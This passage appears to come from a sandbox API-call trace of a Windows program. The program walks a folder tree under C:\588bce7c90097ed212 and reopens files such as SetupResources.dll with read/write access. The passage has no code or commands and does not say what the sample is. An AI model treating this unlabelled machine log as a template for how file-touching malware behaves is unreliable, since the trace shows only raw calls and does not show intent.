Size=0x30) returned 0x4e0a0 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.641] AreFileApisANSI () returned 1 [0061.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0061.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0061.641] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c)) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.641] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.641] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.641] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.641] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.642] AreFileApisANSI () returned 1 [0061.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.642] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.662] AreFileApisANSI () returned 1 [0061.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0061.662] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.663] GetFileType (hFile=0x41c) returned 0x1 [0061.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.663] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.663] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.663] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.663] CloseHandle (hObject=0x41c) returned 1 [0061.664] AreFileApisANSI () returned 1 [0061.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0061.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0061.664] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.665] GetFileType (hFile=0x41c) returned 0x1 [0061.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.665] CloseHandle (hObject=0x41c) returned 1 [0061.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.666] AreFileApisANSI () returned 1 [0061.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0061.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0061.666] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.667] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46210, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㝘")) returned 0 [0061.667] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0061.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0061.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.668] AreFileApisANSI () returned 1 [0061.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070", lpUsedDefaultChar=0x0) returned 27 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.668] AreFileApisANSI () returned 1 [0061.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x780d0 [0061.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x780d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070") returned 27 [0061.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070" (normalized: "c:\\588bce7c90097ed212\\2070"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.669] GetLastError () returned 0x5 [0061.669] GetLastError () returned 0x5 [0061.669] SetLastError (dwErrCode=0x5) [0061.669] GetLastError () returned 0x5 [0061.669] SetLastError (dwErrCode=0x5) [0061.669] GetLastError () returned 0x5 [0061.669] SetLastError (dwErrCode=0x5) [0061.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x780d0 | out: hHeap=0x20000) returned 1 [0061.669] AreFileApisANSI () returned 1 [0061.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78110 [0061.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78110, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070") returned 27 [0061.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070" (normalized: "c:\\588bce7c90097ed212\\2070"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.669] GetLastError () returned 0x5 [0061.669] GetLastError () returned 0x5 [0061.669] SetLastError (dwErrCode=0x5) [0061.669] GetLastError () returned 0x5 [0061.670] SetLastError (dwErrCode=0x5) [0061.670] GetLastError () returned 0x5 [0061.670] SetLastError (dwErrCode=0x5) [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78110 | out: hHeap=0x20000) returned 1 [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.670] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.670] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="3076", cAlternateFileName="")) returned 1 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.670] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78010 [0061.761] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 